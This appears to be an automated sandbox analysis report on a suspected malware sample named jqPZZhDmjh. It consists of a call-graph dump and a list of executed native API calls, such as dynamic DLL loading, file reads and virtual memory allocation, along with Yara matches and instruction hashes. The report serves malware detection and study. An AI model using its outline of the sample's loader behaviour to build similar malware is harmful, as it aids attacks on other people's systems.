97701 98bf98 97701->97674 97703 98af50 LdrLoadDll 97702->97703 97704 98a41c NtReadFile 97703->97704 97704->97673 97706 98bba4 97705->97706 97707 98bb8d 97705->97707 97706->97685 97707->97706 97708 98bf80 2 API calls 97707->97708 97709 98bbbb 97708->97709 97709->97685 97710->97675 97711->97664 97713 98af50 LdrLoadDll 97712->97713 97714 98a63c RtlAllocateHeap 97713->97714 97714->97701 97838 98a530 97715->97838 97717 98bd5d 97717->97606 97719 984071 97718->97719 97720 984079 97718->97720 97719->97609 97742 98434c 97720->97742 97841 98cf20 97720->97841 97722 9840cd 97723 98cf20 2 API calls 97722->97723 97726 9840d8 97723->97726 97724 984126 97727 98cf20 2 API calls 97724->97727 97726->97724 97849 98cfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap ExitProcess 97726->97849 97728 98413a 97727->97728 97729 98cf20 2 API calls 97728->97729 97731 9841ad 97729->97731 97730 98cf20 2 API calls 97738 9841f5 97730->97738 97731->97730 97734 98cf80 3 API calls 97735 98432e 97734->97735 97736 98cf80 3 API calls 97735->97736 97737 984338 97736->97737 97739 98cf80 3 API calls 97737->97739 97846 98cf80 97738->97846 97740 984342 97739->97740 97741 98cf80 3 API calls 97740->97741 97741->97742 97742->97609 97744 985391 97743->97744 97745 984a40 9 API calls 97744->97745 97746 9853a7 97745->97746 97747 9853e2 97746->97747 97748 9853f5 97746->97748 97751 9853fa 97746->97751 97750 98bdb0 3 API calls 97747->97750 97749 98bdb0 3 API calls 97748->97749 97749->97751 97752 9853e7 97750->97752 97751->97613 97752->97613 97850 98ac20 97753->97850 97756 98ac20 LdrLoadDll 97757 98ad7d 97756->97757 97758 98ac20 LdrLoadDll 97757->97758 97759 98ad86 97758->97759 97760 98ac20 LdrLoadDll 97759->97760 97761 98ad8f 97760->97761 97762 98ac20 LdrLoadDll 97761->97762 97763 98ad98 97762->97763 97764 98ac20 LdrLoadDll 97763->97764 97765 98ada1 97764->97765 97766 98ac20 LdrLoadDll 97765->97766 97767 98adad 97766->97767 97768 98ac20 LdrLoadDll 97767->97768 97769 98adb6 97768->97769 97770 98ac20 LdrLoadDll 97769->97770 97771 98adbf 97770->97771 97772 98ac20 LdrLoadDll 97771->97772 97773 98adc8 97772->97773 97774 98ac20 LdrLoadDll 97773->97774 97775 98add1 97774->97775 97776 98ac20 LdrLoadDll 97775->97776 97777 98adda 97776->97777 97778 98ac20 LdrLoadDll 97777->97778 97779 98ade6 97778->97779 97780 98ac20 LdrLoadDll 97779->97780 97781 98adef 97780->97781 97782 98ac20 LdrLoadDll 97781->97782 97783 98adf8 97782->97783 97784 98ac20 LdrLoadDll 97783->97784 97785 98ae01 97784->97785 97786 98ac20 LdrLoadDll 97785->97786 97787 98ae0a 97786->97787 97788 98ac20 LdrLoadDll 97787->97788 97789 98ae13 97788->97789 97790 98ac20 LdrLoadDll 97789->97790 97791 98ae1f 97790->97791 97792 98ac20 LdrLoadDll 97791->97792 97793 98ae28 97792->97793 97794 98ac20 LdrLoadDll 97793->97794 97795 98ae31 97794->97795 97796 98ac20 LdrLoadDll 97795->97796 97797 98ae3a 97796->97797 97798 98ac20 LdrLoadDll 97797->97798 97799 98ae43 97798->97799 97800 98ac20 LdrLoadDll 97799->97800 97801 98ae4c 97800->97801 97802 98ac20 LdrLoadDll 97801->97802 97803 98ae58 97802->97803 97804 98ac20 LdrLoadDll 97803->97804 97805 98ae61 97804->97805 97806 98ac20 LdrLoadDll 97805->97806 97807 98ae6a 97806->97807 97808 98ac20 LdrLoadDll 97807->97808 97809 98ae73 97808->97809 97810 98ac20 LdrLoadDll 97809->97810 97811 98ae7c 97810->97811 97812 98ac20 LdrLoadDll 97811->97812 97813 98ae85 97812->97813 97814 98ac20 LdrLoadDll 97813->97814 97815 98ae91 97814->97815 97816 98ac20 LdrLoadDll 97815->97816 97817 98ae9a 97816->97817 97818 98ac20 LdrLoadDll 97817->97818 97819 98aea3 97818->97819 97820 98ac20 LdrLoadDll 97819->97820 97821 98aeac 97820->97821 97822 98ac20 LdrLoadDll 97821->97822 97823 98aeb5 97822->97823 97824 98ac20 LdrLoadDll 97823->97824 97825 98aebe 97824->97825 97826 98ac20 LdrLoadDll 97825->97826 97827 98aeca 97826->97827 97828 98ac20 LdrLoadDll 97827->97828 97829 98aed3 97828->97829 97830 98ac20 LdrLoadDll 97829->97830 97831 98aedc 97830->97831 97831->97617 97833 98af50 LdrLoadDll 97832->97833 97834 989ecc 97833->97834 97856 15f2df0 LdrInitializeThunk 97834->97856 97835 989ee3 97835->97538 97837->97615 97839 98af50 LdrLoadDll 97838->97839 97840 98a54c NtAllocateVirtualMemory 97839->97840 97840->97717 97842 98cf30 97841->97842 97843 98cf36 97841->97843 97842->97722 97844 98bf80 2 API calls 97843->97844 97845 98cf5c 97844->97845 97845->97722 97847 98bdb0 3 API calls 97846->97847 97848 984324 97847->97848 97848->97734 97849->97726 97851 98ac3b 97850->97851 97852 984e40 LdrLoadDll 97851->97852 97853 98ac5b 97852->97853 97854 984e40 LdrLoadDll 97853->97854 97855 98ad07 97853->97855 97854->97855 97855->97756 97856->97835 97858 15f2c1f LdrInitializeThunk 97857->97858 97859 15f2c11 97857->97859 97858->97623 97859->97623 97861 98a67c RtlFreeHeap 97860->97861 97862 98af50 LdrLoadDll 97860->97862 97861->97627 97863 98a6b2 97861->97863 97862->97861 97864 98af50 LdrLoadDll 97863->97864 97865 98a6bf ExitProcess 97864->97865 97865->97627 97867 977eb0 97866->97867 97868 977eab 97866->97868 97869 98bd30 2 API calls 97867->97869 97868->97546 97870 977ed5 97869->97870 97871 977f38 97870->97871 97872 989eb0 2 API calls 97870->97872 97873 977f3e 97870->97873 97878 98bd30 2 API calls 97870->97878 97882 98a5b0 97870->97882 97871->97546 97872->97870 97875 977f64 97873->97875 97876 98a5b0 2 API calls 97873->97876 97875->97546 97877 977f55 97876->97877 97877->97546 97878->97870 97880 97817e 97879->97880 97881 98a5b0 2 API calls 97879->97881 97880->97502 97881->97880 97883 98af50 LdrLoadDll 97882->97883 97884 98a5cc 97883->97884 97887 15f2c70 LdrInitializeThunk 97884->97887 97885 98a5e3 97885->97870 97887->97885 97889 98b5b3 97888->97889 97892 97ace0 97889->97892 97893 97ad04 97892->97893 97894 979c3a 97893->97894 97895 97ad40 LdrLoadDll 97893->97895 97894->97509 97895->97894 97897 97b053 97896->97897 97899 97b0d0 97897->97899 97911 989c80 LdrLoadDll 97897->97911 97899->97516 97901 98af50 LdrLoadDll 97900->97901 97902 97f1ab 97901->97902 97902->97519 97903 98a7c0 97902->97903 97904 98af50 LdrLoadDll 97903->97904 97905 98a7df LookupPrivilegeValueW 97904->97905 97905->97521 97907 98af50 LdrLoadDll 97906->97907 97908 98a26c 97907->97908 97912 15f2ea0 LdrInitializeThunk 97908->97912 97909 98a28b 97909->97522 97911->97899 97912->97909 97914 97b1b9 97913->97914 97915 97b030 LdrLoadDll 97914->97915 97916 97b1f4 97915->97916 97916->97456 97918 97ae41 97917->97918 97919 97ae3d 97917->97919 97920 97ae8c 97918->97920 97921 97ae5a 97918->97921 97919->97459 97968 989cc0 LdrLoadDll 97920->97968 97967 989cc0 LdrLoadDll 97921->97967 97923 97ae9d 97923->97459 97925 97ae7c 97925->97459 97927 97f490 3 API calls 97926->97927 97928 9843b6 97927->97928 97928->97461 97930 978a79 97929->97930 97969 9787a0 97929->97969 97932 978a9d 97930->97932 97933 9787a0 20 API calls 97930->97933 97932->97463 97934 98bd30 2 API calls 97932->97934 97935 978a8a 97933->97935 97936 978ad5 97934->97936 97935->97932 97987 97f700 11 API calls 97935->97987 97939 978cea 97936->97939 97988 989870 97936->97988 97939->97463 97941 98af50 LdrLoadDll 97940->97941 97942 98a50c 97941->97942 98107 15f2e80 LdrInitializeThunk 97942->98107 97943 97c312 97945 97f490 97943->97945 97946 97f4ad 97945->97946 98108 989fb0 97946->98108 97949 97f4f5 97949->97467 97950 98a000 2 API calls 97951 97f51e 97950->97951 97951->97467 97953 98af50 LdrLoadDll 97952->97953 97954 98a01c 97953->97954 98114 15f2d10 LdrInitializeThunk 97954->98114 97955 97c375 97955->97473 97955->97476 97958 98af50 LdrLoadDll 97957->97958 97959 98a06c 97958->97959 98115 15f2d30 LdrInitializeThunk 97959->98115 97960 97c449 97960->97484 97963 98af50 LdrLoadDll 97962->97963 97964 989e2c 97963->97964 98116 15f2fb0 LdrInitializeThunk 97964->98116 97965 97c49c 97965->97488 97967->97925 97968->97923 97970 977ea0 4 API calls 97969->97970 97985 9787ba 97969->97985 97970->97985 97971 978a49 97971->97930 97972 978a3f 97973 978160 2 API calls 97972->97973 97973->97971 97976 989ef0 2 API calls 97976->97985 97978 98a480 LdrLoadDll NtClose 97978->97985 97981 97c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97981->97985 97984 989e10 2 API calls 97984->97985 97985->97971 97985->97972 97985->97976 97985->97978 97985->97981 97985->97984 98009 989d00 97985->98009 98012 9785d0 97985->98012 98024 97f5e0 LdrLoadDll NtClose 97985->98024 98025 989d80 LdrLoadDll 97985->98025 98026 989db0 LdrLoadDll 97985->98026 98027 989e40 LdrLoadDll 97985->98027 98028 9783a0 97985->98028 98044 975f60 LdrLoadDll 97985->98044 97987->97932 97989 98bf80 2 API calls 97988->97989 97990 989887 97989->97990 98074 979310 97990->98074 97992 9898a2 97993 9898c9 97992->97993 97994 9898e0 97992->97994 97995 98bdb0 3 API calls 97993->97995 97997 98bd30 2 API calls 97994->97997 97996 9898d6 97995->97996 97996->97939 97998 98991a 97997->97998 97999 98bd30 2 API calls 97998->97999 98000 989933 97999->98000 98006 989bd4 98000->98006 98080 98bd70 98000->98080 98003 989bc0 98004 98bdb0 3 API calls 98003->98004 98005 989bca 98004->98005 98005->97939 98007 98bdb0 3 API calls 98006->98007 98008 989c29 98007->98008 98008->97939 98010 98af50 LdrLoadDll 98009->98010 98011 989d1c 98010->98011 98011->97985 98013 9785e6 98012->98013 98014 989870 8 API calls 98013->98014 98015 9785ff 98014->98015 98020 978771 98015->98020 98045 9781a0 98015->98045 98017 9786e5 98018 9783a0 12 API calls 98017->98018 98017->98020 98019 978713 98018->98019 98019->98020 98021 989ef0 2 API calls 98019->98021 98020->97985 98022 978748 98021->98022 98022->98020 98023 98a4f0 2 API calls 98022->98023 98023->98020 98024->97985 98025->97985 98026->97985 98027->97985 98029 9783c9 98028->98029 98052 978310 98029->98052 98032 98a4f0 2 API calls 98033 9783dc 98032->98033 98033->98032 98034 978467 98033->98034 98036 978462 98033->98036 98060 97f660 98033->98060 98034->97985 98035 98a480 2 API calls 98037 97849a 98035->98037 98036->98035 98037->98034 98038 989d00 LdrLoadDll 98037->98038 98039 9784ff 98038->98039 98039->98034 98064 989d40 98039->98064 98041 978563 98041->98034 98042 984a40 9 API calls 98041->98042 98043 9785b8 98042->98043 98043->97985 98044->97985 98046 97829f 98045->98046 98047 9781b5 98045->98047 98046->98017 98047->98046 98048 984a40 9 API calls 98047->98048 98049 978222 98048->98049 98050 98bdb0 3 API calls 98049->98050 98051 978249 98049->98051 98050->98051 98051->98017 98053 978328 98052->98053 98054 97ace0 LdrLoadDll 98053->98054 98055 978343 98054->98055 98056 984e40 LdrLoadDll 98055->98056 98057 978353 98056->98057 98058 97835c PostThreadMessageW 98057->98058 98059 978370 98057->98059 98058->98059 98059->98033 98061 97f673 98060->98061 98067 989e80 98061->98067 98065 989d5c 98064->98065 98066 98af50 LdrLoadDll 98064->98066 98065->98041 98066->98065 98068 989e8c 98067->98068 98069 98af50 LdrLoadDll 98068->98069 98070 989e9c 98069->98070 98073 15f2dd0 LdrInitializeThunk 98070->98073 98071 97f69e 98071->98033 98073->98071 98075 979335 98074->98075 98076 97ace0 LdrLoadDll 98075->98076 98077 979368 98076->98077 98079 97938d 98077->98079 98083 97cf10 98077->98083 98079->97992 98101 98a570 98080->98101 98084 97cf3c 98083->98084 98085 98a1d0 LdrLoadDll 98084->98085 98086 97cf55 98085->98086 98087 97cf5c 98086->98087 98094 98a210 98086->98094 98087->98079 98091 97cf97 98092 98a480 2 API calls 98091->98092 98093 97cfba 98092->98093 98093->98079 98095 98af50 LdrLoadDll 98094->98095 98096 98a22c 98095->98096 98100 15f2ca0 LdrInitializeThunk 98096->98100 98097 97cf7f 98097->98087 98099 98a800 LdrLoadDll 98097->98099 98099->98091 98100->98097 98102 98af50 LdrLoadDll 98101->98102 98103 98a58c 98102->98103 98106 15f2f90 LdrInitializeThunk 98103->98106 98104 989bb9 98104->98003 98104->98006 98106->98104 98107->97943 98109 98af50 LdrLoadDll 98108->98109 98110 989fcc 98109->98110 98113 15f2f30 LdrInitializeThunk 98110->98113 98111 97f4ee 98111->97949 98111->97950 98113->98111 98114->97955 98115->97960 98116->97965 98118 15f2ad0 LdrInitializeThunk

                                                                            Executed Functions

                                                                            Function 0097ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 232 97ace0-97acfc 233 97ad04-97ad09 232->233 234 97acff call 98cc40 232->234 235 97ad0f-97ad1d call 98d060 233->235 236 97ad0b-97ad0e 233->236 234->233 239 97ad1f-97ad2a call 98d2e0 235->239 240 97ad2d-97ad3e call 98b490 235->240 239->240 245 97ad57-97ad5a 240->245 246 97ad40-97ad54 LdrLoadDll 240->246 246->245
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0097AD52
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                            • Instruction ID: a425d6dbdd5a507ac6a708628e3b81d0e99169d073d9f89bdf3806466f5fc072
                                                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                            • Instruction Fuzzy Hash: 610112B6D4020DA7DB10EAA4DC42FDDB3789B54308F108595E91C97291F631EB14CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0098A350 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 247 98a350-98a3a1 call 98af50 NtCreateFile
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00979CE3,?,00984BA7,00979CE3,FFFFFFFF,?,?,FFFFFFFF,00979CE3,00984BA7,?,00979CE3,00000060,00000000,00000000), ref: 0098A39D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction ID: 5fbdcdf9f3cb0ead52fd0bb41737d90b46efba82b1f6252cf2be6e4ad6aba07d
                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction Fuzzy Hash: 08F0BDB2200208AFCB08DF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0098A400 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 250 98a400-98a449 call 98af50 NtReadFile
                                                                            APIs
                                                                            • NtReadFile.NTDLL(00984D62,5EB65239,FFFFFFFF,00984A21,?,?,00984D62,?,00984A21,FFFFFFFF,5EB65239,00984D62,?,00000000), ref: 0098A445
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction ID: 3f3dce1275355eca861b95ac8bd541955e3df42f979b2e2ed4a4cd46666c215b
                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction Fuzzy Hash: 76F0B7B2200208AFDB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E811CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0098A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 256 98a530-98a56d call 98af50 NtAllocateVirtualMemory
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0098B124,?,00000000,?,00003000,00000040,00000000,00000000,00979CE3), ref: 0098A569
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction ID: 1c00bc1e4891a9ed45bd1ee59e4e9caf3c907c3e2d0d705af16455b1d25f6c87
                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction Fuzzy Hash: 3DF015B2200208AFDB14DF89CC81EAB77ADAF88754F118149BE1C97241C630F810CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0098A52C Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 253 98a52c-98a546 254 98a54c-98a56d NtAllocateVirtualMemory 253->254 255 98a547 call 98af50 253->255 255->254
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0098B124,?,00000000,?,00003000,00000040,00000000,00000000,00979CE3), ref: 0098A569
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 6499e8fa36d8993f79e5c8178206fbcd015763605b595464c285486d50662366
                                                                            • Instruction ID: 28a4d26cc45902ca46dd63382ad147252c36dbd1ec8e30e7ecf1693efa17ba9f
                                                                            • Opcode Fuzzy Hash: 6499e8fa36d8993f79e5c8178206fbcd015763605b595464c285486d50662366
                                                                            • Instruction Fuzzy Hash: 43F015B2200208AFDB14DF88CC91EAB77ADAF88754F158149FE1C97341C634E910CBE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0098A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtClose.NTDLL(00984D40,?,?,00984D40,00979CE3,FFFFFFFF), ref: 0098A4A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction ID: 906f48246b8dfda1474d4b6a4f9a2b1be9a060aaa950ea6c1a7af7b3c52cffc4
                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction Fuzzy Hash: 41D01776200214ABE710EB98CC85FA77BACEF88760F154499BA1C9B242C530FA0087E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0098A47C Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 280 98a47c-98a496 281 98a49c-98a4a9 NtClose 280->281 282 98a497 call 98af50 280->282 282->281
                                                                            APIs
                                                                            • NtClose.NTDLL(00984D40,?,?,00984D40,00979CE3,FFFFFFFF), ref: 0098A4A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: ccc6d7e7147fe07a637f85aec792b8ecc79b1abc25d90ae8e6df0f92908d5df9
                                                                            • Instruction ID: 2a08ba9c50dafd900ee0d8c67ea7922b0d8373e886b7324801ab789a0aad8f7e
                                                                            • Opcode Fuzzy Hash: ccc6d7e7147fe07a637f85aec792b8ecc79b1abc25d90ae8e6df0f92908d5df9
                                                                            • Instruction Fuzzy Hash: 83E01275600214ABD710EBD8CC45FA77B68EF44750F154455BA1C9B242C534FA0087D0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: e94bc6978d7fcc568a10d48fe21c38e570833ca53f7670247569262259202196
                                                                            • Instruction ID: b64dbe47552d3c2e1e1a40c0ae21df5f4360f82149cd560b2b0f79d717e63e8a
                                                                            • Opcode Fuzzy Hash: e94bc6978d7fcc568a10d48fe21c38e570833ca53f7670247569262259202196
                                                                            • Instruction Fuzzy Hash: 8D90026160280043410AB5584814617400E97E0201B55C421E50146D4EC52589D16225
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: f15efb3a4f2eb054f4a0bc7beb35dea225716827f3e7d6c2e27357dbf6661502
                                                                            • Instruction ID: 2c3a2abf13ef261b12ecd649e55fd3e9342be0b4a91d13bed952eec31965ae07
                                                                            • Opcode Fuzzy Hash: f15efb3a4f2eb054f4a0bc7beb35dea225716827f3e7d6c2e27357dbf6661502
                                                                            • Instruction Fuzzy Hash: A490023160180842D185B558480464B000997D1301F95C415A4025798ECA158B9977A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 611ac73d04ce068f2f4f6a00455794d302600f195c4671ff3dab4bb13a7b53f3
                                                                            • Instruction ID: 81a0a1e407cc0f764e1bd30e66bf37f6745a782d5b224df142b35d541b646590
                                                                            • Opcode Fuzzy Hash: 611ac73d04ce068f2f4f6a00455794d302600f195c4671ff3dab4bb13a7b53f3
                                                                            • Instruction Fuzzy Hash: 1690022561180043010AF9580B04507004A97D5351355C421F5015694DD62189A15221
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 1146e333c59b167dc5c973c36dc40d798bddf5dc6d87c4ad0d35ffda5e5e2f76
                                                                            • Instruction ID: f29d9cb147b1299e9ed388af8bb981adb4ff33e62027679596491c623a4264c6
                                                                            • Opcode Fuzzy Hash: 1146e333c59b167dc5c973c36dc40d798bddf5dc6d87c4ad0d35ffda5e5e2f76
                                                                            • Instruction Fuzzy Hash: 4690022961380042D185B558580860B000997D1202F95D815A401569CDC91589A95321
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

